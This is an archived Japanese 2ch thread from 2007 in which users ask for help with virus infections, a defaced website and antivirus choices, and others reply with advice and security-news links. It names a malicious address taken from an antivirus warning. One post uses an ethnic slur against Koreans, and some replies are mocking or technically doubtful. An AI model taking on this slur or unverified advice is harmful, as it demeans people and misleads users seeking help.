早速のお返事ありがとうございます。
そして書き方が悪くてすいません。
81.95.149.28/logo/index.phpは、ウィルスバスターの警告ウィンドウに表示されていたアドレスで、
自サイトのアドレスではないんですが…、というのが伝わっていてのご回答だったらすいません…。
ちなみに『実行するには~』という窓は、記憶する限り出てきていないです。
274: ◆N9P3SuvBPo
07/06/13 01:07:51
>273
>自サイトのアドレスではないんですが…
あれ?
>271では
>【どんな症状が出るか】 「自分のHPを見ると、『警告 危険なWebサイトです』というスパイウェアの警告が表示されます。
>アドレスは『81.95.149.28/logo/index.php』です。
って書いてあるんだけど…
>ちなみに『実行するには~』という窓は、記憶する限り出てきていないです。
UAC=ユーザーアカウント制御の画面が出てないのに、マルウェアにやられた?
275: ◆N9P3SuvBPo
07/06/13 01:22:59
仕方ない…誘導する
URLリンク(www.higaitaisaku.com)
↑の「PCトラブル質問掲示板」で質問
276:名無しさん@お腹いっぱい。
07/06/13 01:25:17
URLリンク(suzukiairi.net)
これ押しちゃったんですがやばいですか?
なんか字がいっぱい書いてあるメモ帳みたいなのが表示されて
今のトコなんもないんですけど・・・
277:271
07/06/13 01:35:30
>275
バスターの警告ウィンドウに「アドレス」という項目があって、
そのつもりで書いてました…。文章悪くてすいません…。
質問掲示板、行ってみます!ありがとうございました!
278:名無しさん@お腹いっぱい。
07/06/13 01:45:19
>>276
PHP入れてないだろ? なら無問題
279:名無しさん@お腹いっぱい。
07/06/13 08:04:36
>>277
>>255-256
280:277
07/06/13 15:44:08
>279
そちらも参照して、iframeの削除とキャッシュのクリアはやってみました。
また、HPでphpは使っていません。が、やはりHPの改竄がされてしまっているようです…。
サーバーは、2つ使っていて2つとも改竄されてしまっているので、
サーバーではなく、やはりこちらのパソコンの問題だと思うのですが、ウィルスも検出されません。
ちなみに、改竄された自サイトにアクセスした時に警告が出て、その時に隔離されたウィルスのログは
"ウイルスログ","2007/06/13","B-PC"
"時刻","検索の種類","種類","ウイルス名",
"ファイル名","ウイルス検出時の処理","駆除できない場合の処理"
"12:03","リアルタイム検索","ファイル","JS_PSYME.AGB",
"C:\Users\b\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\2XV27BGG\index_mp[1].htm","隔離 済み(安全です)",""
です。
私も同じく、ネットにつながらなくなったり重くなったりしています。
281:名無しさん@お腹いっぱい。
07/06/13 17:09:41
>>280
だから切り分けろって。
そのPCが何か踏んでいて改竄しているのか、
第三者(海外など)から改竄されているのか。
何か踏んでそのPCからパスワード抜かれた可能性もあるから
サイトのパスワードも別PCで変えて、その上で
そのPCでしばらくアクセスしない(メンテは別PCでする)。
それでも改竄されるなら後者だろ?
あとはサーバ管理者と話せ。
282:名無しさん@お腹いっぱい。
07/06/13 17:26:28
>>280
あとURLリンク(www.ipa.go.jp)にも報告したほうがいいよ
サーバもログインID&パスワードを感染していない安全なPCで変更したほうがいいよ
283:名無しさん@お腹いっぱい。
07/06/13 20:31:43
流れぶったぎってわるいがBITSネタ
BITSを使って侵入してくる悪者たち
URLリンク(itpro.nikkeibp.co.jp)
284:名無しさん@お腹いっぱい。
07/06/14 20:24:15
Web 2.0は危険がいっぱい 悪意のJavaScriptで情報が漏えい
URLリンク(itpro.nikkeibp.co.jp)
285:名無しさん@お腹いっぱい。
07/06/14 21:08:35
BITSが危ないってネタが出てからサービスを無効にしているが、
有名どころでBITS使うのってMSのうpだてとGoogle アップデータぐらいだよな?
他に何かある?
286:名無しさん@お腹いっぱい。
07/06/14 21:39:33
ロシアでは去年技術文書が出ていて
ドイツで4月か5月には実装したMalwareが出回ってる。
287:名無しさん@お腹いっぱい。
07/06/14 23:34:41
AV-Test.org Reports Stats from Antivirus Roundup 検知力テスト結果 (2007年05月22日)
URLリンク(www.pcmag.com)
01位)WebWasher 99.83% (605,846)
02位)AVK 2007 99.56% (604,255)
03位)AntiVir 99.42% (603,408)
04位)F-Secure. 97.93% (594,333)
05位)Symantec 97.77% (593,355)
06位)Kaspersky 97.64% (592,606)
07位)Fortinet. 97.06% (589,028)
08位)Avast!. 96.32% (584,574)
09位)AVG. 96.15% (583,541)
10位)Rising 96.02% (582,772)
11位)BitDefender 95.68% (580,700)
12位)Norman.. 94.66% (574,476)
13位)Ikarus.. 92.54% (561,607)
14位)Panda. 92.09% (558,899)
15位)Trend Micro 90.97% (552,107)
16位)Nod32. 88.32% (536,043)
17位)McAfee 87.28% (529,680)
288:名無しさん@お腹いっぱい。
07/06/15 20:08:02
>261
亀ですみません、ありがとうございました。
spypodを半月ぶりにしてみたら「DNSChanger」という何か名前的にすごく嫌な
感じのファイルが検出されて…。ググるとトロイの木馬ということみたいなのですが
「コンピュータがハッカーに遠隔操作され、ポートが勝手に開かれてしまう...危険度70%」等と
あったのですが、このポートというものが開かれているって、自分のパソコンのどこを
見れば分かりますか…?
最近ネットに繋がったり繋がらなかったりするのもこれのせいなのかなって…
289:名無しさん@お腹いっぱい。
07/06/15 21:02:41
手遅れだな。チーン
290:名無しさん@お腹いっぱい。
07/06/15 21:56:16
ボット対策を議論「もはや感染予防ソリューションでは対応不可能」
URLリンク(internet.watch.impress.co.jp)
291:名無しさん@お腹いっぱい。
07/06/15 23:09:00
どんな纏めだよw
292:名無しさん@お腹いっぱい。
07/06/16 20:14:36
Googleがユーザーをウイルス扱い? Kaspersky Labが問題提起
URLリンク(www.itmedia.co.jp)
293:名無しさん@お腹いっぱい。
07/06/16 23:49:13
Kaspersky Labの顧客=スパマー
294:名無しさん@お腹いっぱい。
07/06/17 00:06:03
↑NOD厨乙。
295:名無しさん@お腹いっぱい。
07/06/17 00:19:45
>>292
NOD信者がウイルス扱いされるって話だったら、物凄く納得できるけどな。
つーか実際ウイルスだし。
296:名無しさん@お腹いっぱい。
07/06/17 01:05:54
>>295
ウイルスに失礼だろw
297:初心者
07/06/17 01:59:39
どなたか詳しい方教えて下さい。
アンチウィルスソフトはどこがいいですか?
以前マイクロトレンドのウィルスバスターを使っていたのですが、
立ち上がりの遅さとこの会社の管理体制の甘さがいやになって、
ソースネクストのウィルスセキュリティに変えました。
ウィルスセキュリティは立ち上がりが早く、廉価で気に入っているのですが、
2ちゃんの書き込みを見ていると、どうやら他のソフトよりも劣るみたいです。
(他社のソフトでウィルス反応が出ても、ウィルスセキュリティでは出なかったりとか…)
どうか先輩方、よろしくお願いします。
298:名無しさん@お腹いっぱい。
07/06/17 02:03:55
>>297
体験版で試せとしか言えん
「これ」と指定するとアンチが沸く
299:名無しさん@お腹いっぱい。
07/06/17 08:33:40
>立ち上がりの遅さとこの会社の管理体制の甘さがいやになって、
>ソースネクストのウィルスセキュリティに変えました。
おまえ、漫才師になれるぞ。
300:名無しさん@お腹いっぱい。
07/06/17 09:17:26
ウイルスセキュリティZEROはその名のとおりセキュリティがゼロだっていうのにね…
ノーガード戦法万歳!ですよ。
301:名無しさん@お腹いっぱい。
07/06/18 16:11:38
>281>282
別パソコンからパスワード変えて収まりました。
ありがとうございました!
302:名無しさん@お腹いっぱい。
07/06/18 21:25:17
Webベースの「スーパー・ワーム」がまもなく登場か?
URLリンク(itpro.nikkeibp.co.jp)
“見えない”攻撃に挑む
URLリンク(itpro.nikkeibp.co.jp)
303:名無しさん@お腹いっぱい。
07/06/19 19:58:59
大規模なウェブ攻撃「Mpack」が猛威--セキュリティ企業が注意を呼びかけ
URLリンク(japan.cnet.com)
「Mpack」と名づけられた今回の攻撃は、クロスサイトスクリプティングを用いて合法的なウェブサイトに悪質なiFrameを配置する
Trend Microは、このような攻撃を防ぐために、ソフトウェアのインストールを求めるサイトに注意するように呼びかけている。
信頼できるサイトかソフトウェア配信元でなければ、ソフトウェアのインストールを許可してはならない。
パソコン上のソフトウェアにはすべてパッチを適用し、ウイルス対策ソフトウェアを更新すること。
304:297
07/06/19 22:22:12
>>298
ご助言、ありがとうございます。
フリーのスキャンを色々試しています。
そしたら、出るわ出るわ・・・。PANDAではかなり出ました。
ウィルスセキュリティでは無反応なのに。
2chとかアングラにアクセスするのはウィルスセキュリティでは危険すぎますね。
>>299お褒めのお言葉、ありがとうございます。
305:名無しさん@お腹いっぱい。
07/06/19 22:42:07
あるネトゲを起動したら、こんなの検出したんですが・・・
ラグナロクもwinyyもやってないのになぁ
ウィルスバスターで全体検査しとけばいいのかな?
URLリンク(www.trendmicro.co.jp)
306:名無しさん@お腹いっぱい。
07/06/19 23:18:53
あるネトゲってなんだよ。
まずは運営に通報しろよ
307:名無しさん@お腹いっぱい。
07/06/20 00:41:53
【使用OS】 Windows xp
【使用セキュリティソフトとバージョン】 K7 Computing?の製品だと思いますが、名前がわかりません。
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 されていないと思います。
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
magistrとMS05-002と表示されました。削除できたかどうか不明です。
【どんな症状が出るか】 C:\Windows\System32\lsass.exeは状態コード259で突然終了しました
と表示され再起動を繰り返します。
テンプレにあった再起動を止める方法を試しているのですが、ようこその画面が出てすぐにカウントが
始まるため、停止出来ません。セーフモードではうごきますが、USBメモリで移したマイクロソフトの駆除ツールも動いてくれません。
友人からの頼まれなのですが、当方知識が浅いため困っております。
どなたか対処の方法をご鞭撻宜しくお願い致します。
308:名無しさん@お腹いっぱい。
07/06/20 08:15:13
頼まれて出来ないなら、リカバリすれ。
データは諦めてな。
309:名無しさん@お腹いっぱい。
07/06/20 08:39:35
>>307
これじゃね?
URLリンク(www.microsoft.com)
310:名無しさん@お腹いっぱい。
07/06/20 09:04:26
>>307
XPをSP2にしていないのか? WindowsUpdateしていないのか?
K7ってことはソースネクストだが、こんなもんすら阻止できないのか?
311:名無しさん@お腹いっぱい。
07/06/20 09:26:25
カスペ先生がポルノウェア not-a-virus:Porn-Dialer.Win32.Agent.aw
を7つも発見しました。テプコ光IP電話を使っているのですが、
この場合電話は大丈夫でしょうか?モデムタイプのウェアなのでしょうか?
312:305
07/06/20 19:08:02
プレイしてたネトゲはファンタジーアースです。
あの後、全体検査も検出0で済み
安心していつも通りPC使用。
先ほどネット閲覧してたら急に処理が重くなり
上記と同じウィルスをバスターが再度検出。
その後、デスクトップに壁紙以外
何も映ってない状態になりました。
こうなっては、タスクマネージャーの開き方くらいしか分からないため
取りあえず開いてみると
中にCPU99使用してるプロセスが。
名称 System Idle Proce...
プロセス終了も受け付けてくれず、途方に暮れてます。
対処方何かないでしょうか・・・
313:名無しさん@お腹いっぱい。
07/06/20 20:16:31
>>312
System Idle ProcessはCPUの空き時間を表示してる。
セーフモードで起動して、>>305のサイトの「対応方法」の通りにすればいい。
314:名無しさん@お腹いっぱい。
07/06/21 00:51:44
質問です。
フリーでオススメのウイルス対策ソフトは、ありますか?
スレ違いでしたら、誘導お願いします。
315:名無しさん@お腹いっぱい。
07/06/21 01:14:12
>>314
【無料】 フリーセキュリティ の組合せ 3
スレリンク(sec板)
フリーのアンチウイルスソフト Part11
スレリンク(sec板)
316:名無しさん@お腹いっぱい。
07/06/21 12:52:59
ウィルスに感染して困ってんだったら、ここに行って相談
URLリンク(www.symantec.com)
317:名無しさん@お腹いっぱい。
07/06/21 13:32:38
>>248
新種ウイルスの検知結果が追加
hURLリンク(www5.uploader.jp)
Microsoftアンチウイルス検知名:Wrom:Win32./nuwar.gen
Kaspersky検知名:Trojan-Downloader.Win32.Tibs.lf
アンラボV3やNOD32などは、まだ検知できていないので、
それらのユーザーさんはご注意して下さい。
318:名無しさん@お腹いっぱい。
07/06/22 02:03:34
【使用OS】 「XP」
【使用セキュリティソフトとバージョン】 「avast!」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「しています」
【ルータの有無】 「なし」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「なし」
【どんな症状が出るか】 「10分ぐらいの間隔で画面上に赤丸で埋め尽くされる、再起動するとタスクマネージャが使用不可になってたりインターネットのホームが固定される」
【症状が出る前に何をやったか】 「winny」
【症状を解決しようとどのような処置を取ったか】 「各種ウィルススキャンなど
319:名無しさん@お腹いっぱい。
07/06/22 05:59:14
>>318
>>13
320:名無しさん@お腹いっぱい。
07/06/22 10:17:45
前から疑問だったんだが、このスレでは
『ノートンはスルーしてるけど、スパイボットは反応する』
という事案も対応してるの?
スパイウェアはスパイウェアで専用スレが有るのか?
321:名無しさん@お腹いっぱい。
07/06/22 12:26:38
日本語で
322:名無しさん@お腹いっぱい。
07/06/22 13:26:22
餅は餅屋
323:名無しさん@お腹いっぱい。
07/06/22 14:42:15
他人の携帯を覗き見するウィルスってあります?
324:名無しさん@お腹いっぱい。
07/06/22 15:44:58
スゲー重いんですけど、この重さ異常
325:名無しさん@お腹いっぱい。
07/06/22 15:50:12
NOD厨が2CHで変なスクリプト埋め込んでるらしい
326:名無しさん@お腹いっぱい。
07/06/22 16:59:18
なんかロシア発関連が多い
米在モスクワ大使館
ロシア政府がサイバー攻撃してる悪寒。
327:名無しさん@お腹いっぱい。
07/06/22 17:01:57
>>323
答えはNOだ。
しかしWindows Mobile
ノキアなどなら可能になるかもしれない。
通常のケータイでは不可
328:名無しさん@お腹いっぱい。
07/06/22 17:12:56
>>326
確かに今ロシア激ヤバだが、最近2CHにも変な外人が出入りしてるよな
329:名無しさん@お腹いっぱい。
07/06/22 20:20:40
ウェブアプリの脆弱性も感染手段--JPCERT/CC、ボットの実態を調査
URLリンク(japan.cnet.com)
調査資料
URLリンク(www.jpcert.or.jp)
330:名無しさん@お腹いっぱい。
07/06/22 20:46:28
変な外人?
チョン共がザパニーズでもしたのかな
331:名無しさん@お腹いっぱい。
07/06/23 23:45:41
【使用OS】 「XP」
【使用セキュリティソフトとバージョン】 「Norton2002」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「再インスコ後に更新」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「なし」
【どんな症状が出るか】 「映像ファイルをメディアプレイヤー(WMPに限
らず)で再生すると、その再生と一緒に知らない音楽が鳴ってしまう。
【症状が出る前に何をやったか】 「不明」
【症状を解決しようとどのような処置を取ったか】 「システムの復元→
Cドライブを再インスコに→全ドライブのウィルスチェック」
332:331
07/06/23 23:49:04
↑よろしくお願いします。
333:名無しさん@お腹いっぱい。
07/06/23 23:52:31
映像ファイルとやらに聞いてみ
334:名無しさん@お腹いっぱい。
07/06/23 23:52:43
【使用OS】 「win XP home」
【Microsoft Update(MU)の状態】 「わかりません・・」
【使用セキュリティソフトとバージョン】 「K7 Computingの物」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「3月くらいのものです」
【ルータの有無】 「有り coregaルーター」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「名前はわかりません・・;;警告が出た直後に再起動してしまいました;;」
【どんな症状が出るか】 「ようこそ画面にドクロが表示され、Alt+F4でのみログイン可能です。デスクトップにいった後は、
一部のアプリケーションが起動しません。K7(略)のセキュルティソフトも起動しません;;」
【症状が出る前に何をやったか】 「オンラインゲーム等しか心当たりは;;」
【症状を解決しようとどのような処置を取ったか】 「いろいろ検索したりしましたが、言葉や説明が難しく得意でない私にはわかりません・・」
【その他の質問】 「削除方法はないのでしょうか?」
335:名無しさん@お腹いっぱい。
07/06/23 23:57:12
リカバリっすね
336:名無しさん@お腹いっぱい。
07/06/23 23:57:24
>>334
起動するならオンラインスキャンで
337:名無しさん@お腹いっぱい。
07/06/23 23:59:16
>>334
気づきませんでした;;今からやってみます。
338:名無しさん@お腹いっぱい。
07/06/24 00:02:31
髑髏か・・・リカバリ推奨やな
339:名無しさん@お腹いっぱい。
07/06/24 03:08:42
【症状が出る前に何をやったか】 「オンラインゲーム等しか心当たりは;;」
↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑
P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨
発見発見発見発見発見発見発見発見発見発見発見発見発見発見発見発見
Winny使用者Winny使用者Winny使用者Winny使用者Winny使用者Winny使用者
感染かわいそう感染かわいそう感染かわいそう感染かわいそう感染かわいそう
ね~ね~ね~ね~ね~ね~ね~ね~ね~ね~ね~ね~ね~ね~ね~ね~
340:名無しさん@お腹いっぱい。
07/06/25 02:38:39
>>334
URLリンク(blog.livedoor.jp)
341:名無しさん@お腹いっぱい。
07/06/26 20:14:08
あの「Lhaca」がアブない、日本標的のゼロデイウイルス発見
URLリンク(itpro.nikkeibp.co.jp)
米シマンテックは2007年6月25日(米国時間)、ファイル圧縮・解凍ソフト「Lhaca(ラカ)」のぜい弱性を悪用するウイルス(悪質なプログラム)が確認されたとして注意を呼びかけた。
LZH形式(.lzh)のウイルスをLhacaで読み込むと、パソコンを乗っ取られる恐れがある。
今回のウイルスが悪用するぜい弱性に対する修正プログラムなどは公表されていないので、「ゼロデイウイルス」といえる。
今回のウイルスは、日本のユーザーから6月22日に同社に送られたという。同社が解析したところ、何らかのぜい弱性を突くものであることが明らかとなった。
その後の調査で、日本国内で広く使われているLhacaに、修正プログラムが未公開のぜい弱性があることが判明。今回のウイルスはそのぜい弱性を悪用するものだと分かった。
同社の情報によれば、少なくてもLhaca(デラックス版)1.20に、今回のぜい弱性が存在するという。
同社が検証したところ、日本語版Windows XP上のLhaca 1.20において、ウイルスは動作したという。
LZH形式ファイルであるウイルスをLhacaで読み込むと、ウイルスは別のウイルスを生成して実行する。
生成されたウイルスは「バックドア」と呼ばれる種類のウイルスで、攻撃者(ウイルス作者)が遠隔からそのパソコンを操作できるようにする。
つまり、攻撃者にパソコンを乗っ取られる恐れがある。
LZH形式やLhacaおよび一太郎は、主に日本国内で利用されているので、今回のウイルスは日本のユーザーを標的にしている可能性が高いという。
Symantec Security Response Weblog
Beware of LZH
URLリンク(www.symantec.com)
342:名無しさん@お腹いっぱい。
07/06/27 17:25:05
★質問用テンプレ★
【使用OS】 「」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「ソースネクストウィルスセキュリティ」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「Adaware現状最新版」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「YES」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「c:\windows\system32\cbxvw.dll がみつかり、Adware.Win32.Virtumonde.fp と認識するが駆除できず」
【どんな症状が出るか】 「winlogonプロセスが50%ほどCPUをつかう」
【症状が出る前に何をやったか】 「特に覚えがない が、前日まで正常に起動し 次の朝起動したら症状発生」
【症状を解決しようとどのような処置を取ったか】 「セーフモード起動でウィルススキャンとアドウェアスキャンを実行
また、直接ファイルを削除しようとしても削除できず→別のプロセスが使用している様子」
【その他の質問】 「起動時に必ずウィルスセキュリティが隔離するものの削除ができないんで困っています。」
343:342
07/06/27 17:26:24
入力忘れです。
【使用OS】 「XP PRO SP2」
【Microsoft Update(MU)の状態】 「必要ないものもとにかくすべて入れてあります」
344:名無しさん@お腹いっぱい。
07/06/27 18:01:23
> 【使用セキュリティソフトとバージョン】 「ソースネクストウィルスセキュリティ」
また釣りか・・・
345: ◆N9P3SuvBPo
07/06/27 18:30:53
>343
具体的には、何らかのソフトのページに飛ばされると言ったとこかな?
つ「VundoFix」
346:名無しさん@お腹いっぱい。
07/06/27 19:47:52
>>345
情報ありがとうございます
具体的にはおっしゃるとおりです。
あと、WinDoctorのページが勝手にIEでたちあがったりもしますね・・・・orz
ちょっと検索してきます。
347:名無しさん@お腹いっぱい。
07/06/27 20:39:16
>>345
無事解決できました!!
Googleでウィルス名で調べても無理だったのでカナリあきらめていたんですが・・・
すっごい助かりました!!!
感謝です
348: ◆N9P3SuvBPo
07/06/27 21:54:50
>347
早っw
念の為、カスペのオンラインスキャンでもやっとけ。
349:名無しさん@お腹いっぱい。
07/06/27 23:46:03
【使用OS】 XP
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウイルスバスター2006 最新
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
【スパイウェア対策ソフト】 なし
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャンしても何も出ず
【どんな症状が出るか】 起動して数分経ったら画面が切り替わるような動作をして
音声が出なくなり、ウィンドウの上の部分が勝手にクラシックタイプ
な感じになり、何かをインストールするとフリーズしてしまいます
【症状が出る前に何をやったか】 何やらexeを踏んだ気が
350: ◆N9P3SuvBPo
07/06/28 00:00:45
>349
そのパソコンをセーフモードで起動して
システムの復元で問題発生前の日付を選んで復元
…失敗に終わったらリカバリしろ
351:名無しさん@お腹いっぱい。
07/06/28 00:12:07
>>350
システム復元やってみます
・・・因みに今さっきまでシステム復元を無効にしてたのですが
もう詰み、オワタ状態じゃないですよね?
352: ◆N9P3SuvBPo
07/06/28 00:24:28
>351
今の状態で復元ポイント確認しろ
ポイントがグレーアウトしてたら、絶望だ。
353:吟遊詩人
07/06/28 10:31:36
>>349
リカバリー自体は、ウィンドウズの修復目的であってウィルス本体は
そのままHDDに残ります。
フルフォーマットしてインストールが確実だと思われ。
354:名無しさん@お腹いっぱい。
07/06/28 12:13:11
>リカバリー自体は、ウィンドウズの修復目的であって
誰が決めた ?
355:349
07/06/28 13:42:24
システム復元ができずリカバリすることにしました
俺滅茶苦茶涙目wwwwwwwwwwwww・・・・
356:吟遊詩人
07/06/28 14:25:43
リカバリ厨現れましたねw
PC初心者ですか?
357:名無しさん@お腹いっぱい。
07/06/28 14:35:30
>>355
しかし一番確実で更に安定するな
358:名無しさん@お腹いっぱい。
07/06/28 14:51:40
【使用OS】 XPSP2
【Microsoft Update(MU)の状態】 AUTO
【使用セキュリティソフトとバージョン】 ウィルスバスター2007
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 常に最新
【スパイウェア対策ソフト】 ウィルスバスター2007
【スパイウェア対策ソフトの更新は定期的に行なっているか】 常に最新
【ルータの有無】 バッファローの無線ルータ
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」
【どんな症状が出るか】 映像ファイルが全てJPGに変わり、焼きそばならたらって絵が表示された。
再生は勿論できない。プレイヤープログラムも起動不可
【症状が出る前に何をやったか】 見たことのないaviファイルを再生した。
【症状を解決しようとどのような処置を取ったか】 ウィルスバスターでスキャンしたが異常なし。
ノートンではひっかかった。
【その他の質問】 もうリカバリしたのでいいんですが、このウィルスってなんですか?